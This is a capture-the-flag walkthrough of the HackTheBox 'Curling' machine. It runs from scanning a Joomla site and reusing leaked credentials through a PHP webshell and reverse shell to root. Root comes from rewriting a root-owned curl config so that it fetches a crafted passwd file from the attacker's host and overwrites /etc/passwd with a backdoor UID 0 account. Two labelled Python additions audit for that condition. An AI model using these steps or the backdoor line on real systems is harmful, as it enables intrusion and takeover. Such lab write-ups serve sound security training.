Port scanning

┌──(mikannse㉿kali)-[~/HTB]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 13:34 CST
Warning: 10.10.10.150 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.150
Host is up (0.074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 12.47 seconds
┌──(mikannse㉿kali)-[~/HTB]
└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.10.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 13:35 CST
Nmap scan report for 10.10.10.150
Host is up (0.078s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.18 seconds

Web

Port 80 is running a Joomla CMS, so scan it with joomscan

    ____  _____  _____  __  __  ___   ___    __    _  _ 
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)

--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://10.10.10.150/ ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.8.8

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://10.10.10.150/administrator/components
http://10.10.10.150/administrator/modules
http://10.10.10.150/administrator/templates
http://10.10.10.150/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://10.10.10.150/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/10.10.10.150/

Version 3.8.8 does not seem to have any exploitable vulnerability, so perhaps we need to start from a component vulnerability? However, a secret.txt is found in the source, giving a string that looks like a password

Curling2018!, and use the name at the end of the article, floris, as the username

Log in at http://10.10.10.150/administrator/ with these credentials

Once we are Super User, we can try for RCE

https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-web/joomla

Add a one-line PHP webshell to protostar's index.php and execute whoami: we are www-data. Set up a reverse shell

Privilege escalation

In configuration.php in the web directory we find the database password: mYsQ!P4ssw0rd$yea!, but after connecting there is nothing special in the database

In floris's home directory there is a backup; clean up the offsets and the ASCII sidebar in it

┌──(mikannse㉿kali)-[~/HTB/curling]
└─$ cat key_dump| sed 's/^.*: \(.*\) .*$/\1/' | tr -d ' \n'
425a6839314159265359819bbb48000017fffffc41cf05f95029617661cc3a344edccccc6e11540023ab4025f802196020180ca000921c7a8340000000000000068069883468646989a6d439ea68c800000f51a00064681a069ea190000000346900078135016e18c2d78c98874a13a00868ae19c02ab0c17d792ec23c7e9d78f53e0809f0735654c27a4886dfa2e931c856921b122133856046a2ddc1730d22b9966ed40cdb87376a3a58ea64115290ad6bb12f081381208205a5f52970c50337dbab3be000ef85f439a414885018438259be5009861e4842d513ea1c2a098c8a47ab1d20a7554072ff177245385090819bbb48

In CyberChef this directly yields the password from the original file: 5d<wdCbdZu)|hChXll, so ssh in as floris. According to the room's hint a process has a problem, so upload pspy
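The hexdump clean-up and CyberChef step above, as an added example that is not part of the original writeup: a Python parser that recovers the bytes of an xxd-style dump by column position (so an ASCII sidebar that happens to look like hex cannot corrupt the data, which a greedy sed capture cannot guarantee), identifies the container by its magic bytes and peels nested bzip2/gzip layers the way CyberChef's magic detection does. The sample dump and the nested stream are constructed here, and the real key_dump is assumed to use xxd's default layout.

```python
import bz2, gzip, re

# Constructed sample in xxd's default layout: "offset: ", 8 groups of 4 hex digits (39 columns,
# space-padded on a short last line), two spaces, ASCII sidebar. The sidebar deliberately holds
# " cafe", which whitespace-splitting or a greedy sed capture could mistake for hex data.
SAMPLE_DUMP = "\n".join([
    "00000000: 425a 6839 3141 5926 5359 2063 6166 6521  BZh91AY&SY cafe!",
    "00000010: 776f 7264 0a" + " " * 29 + "word.",
])
XXD_LINE = re.compile(r"^[0-9a-fA-F]{8}: ")
MAGIC = [(b"BZh", "bzip2"), (b"\x1f\x8b", "gzip"), (b"PK\x03\x04", "zip")]

def parse_xxd(dump: str) -> bytes:
    """Recover bytes by column position and cross-check them against the ASCII sidebar."""
    out = bytearray()
    for line in dump.splitlines():
        if not XXD_LINE.match(line):
            continue  # skip blank, prompt and other noise lines
        chunk = bytes.fromhex(line[10:49].replace(" ", ""))
        sidebar = line[51:]  # may be shorter than chunk if trailing blanks were stripped
        for b, shown in zip(chunk, sidebar):
            expected = chr(b) if 0x20 <= b < 0x7F else "."
            if shown != expected:
                raise ValueError(f"sidebar mismatch at offset {len(out)}: {shown!r} != {expected!r}")
        out += chunk
    return bytes(out)

def identify(data: bytes) -> str:
    """Name the container by magic bytes; the real key_dump starts with 'BZh9' (bzip2)."""
    for sig, name in MAGIC:
        if data.startswith(sig):
            return name
    return "tar" if data[257:262] == b"ustar" else "unknown"

def unwrap(data: bytes, max_layers: int = 8):
    """Peel nested bzip2/gzip layers (as CyberChef's magic does); zip/tar are left to zipfile/tarfile."""
    layers = []
    for _ in range(max_layers):
        kind = identify(data)
        if kind == "bzip2":
            data = bz2.decompress(data)
        elif kind == "gzip":
            data = gzip.decompress(data)
        else:
            break
        layers.append(kind)
    return data, layers

def nested_sample() -> bytes:  # constructed stand-in for key_dump: a gzip stream wrapped in bzip2
    return bz2.compress(gzip.compress(b"constructed-secret"))
```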

We find a suspicious process: curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

The -K parameter loads a config file, which means this process curls a web page and writes the result to output. We also find that we have write permission on this input config file. So make it curl a local file and overwrite the target, which is equivalent to being able to write a file into any directory.

So try adding a backdoor root user:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
floris:x:1000:1004:floris:/home/floris:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash

Write this file locally and start an HTTP server on port 80 on Kali

Modify the input config file:

floris@curling:~/admin-area$ cat input 
url = "http://10.10.14.11/passwd"
output="/etc/passwd"

Wait until the local server receives the curl request, then su to the hack user with password hack, and we are already root!
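To audit for the condition exploited above, here is an added example that is not part of the original writeup: it parses the curl -K config the root job reads and flags an output path outside the job's own directory, and it checks an /etc/passwd excerpt for the two traits of the backdoor line (a hash in the password field and a second UID 0 account). The allowed directory and the sample entries are constructed assumptions.

```python
import re

# Constructed sample: the curl -K config the root cron job reads (a copy of the box's input file).
CURL_CONFIG = 'url = "http://10.10.14.11/passwd"\noutput="/etc/passwd"\n'
# Constructed /etc/passwd excerpt with the backdoor line from the walkthrough appended.
PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
floris:x:1000:1004:floris:/home/floris:/bin/bash
hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash
"""
# curl config lines: option and value separated by whitespace, ':' or '=', value optionally quoted
OPTION = re.compile(r"^-{0,2}([A-Za-z][\w-]*)\s*(?:[=:]|\s)\s*(.*)$")

def parse_curl_config(text: str) -> dict:
    """Parse the lines curl -K accepts into an option -> value dict (comments and blanks skipped)."""
    opts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = OPTION.match(line)
        if m:
            opts[m.group(1)] = m.group(2).strip().strip('"')
    return opts

def config_findings(opts: dict, allowed_dir: str = "/home/floris/admin-area/") -> list:
    """Flag an output path outside the job's working area: root writes wherever this file says."""
    out = opts.get("output")
    if out and not out.startswith(allowed_dir):
        return [f"output points outside {allowed_dir}: {out}"]
    return []

def passwd_findings(text: str) -> list:
    """Flag a hash (or empty password) in the password field and any non-root UID 0 account."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        f = line.split(":")
        if len(f) != 7:
            findings.append((n, "malformed entry"))
            continue
        name, pw, uid = f[0], f[1], f[2]
        if pw not in ("x", "*", "!", "!!"):
            findings.append((n, f"{name}: password hash or empty password in /etc/passwd, bypasses shadow"))
        if uid == "0" and name != "root":
            findings.append((n, f"{name}: extra UID 0 account"))
    return findings
```

A writable config read by a root job is the root cause here; the passwd check only catches the result after the fact.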

Closing thoughts

Joomla RCE is really much like WordPress: edit a template to write in a PHP webshell. The privilege escalation afterwards was more interesting. Although it is process-based privesc, in practice it abuses curl to write arbitrary files as root, and once you can write files there are plenty of ways to escalate: writing sudoers (although that did not work when I tried it), writing /etc/passwd, or, as in the official writeup, writing a cron job to get a reverse shell.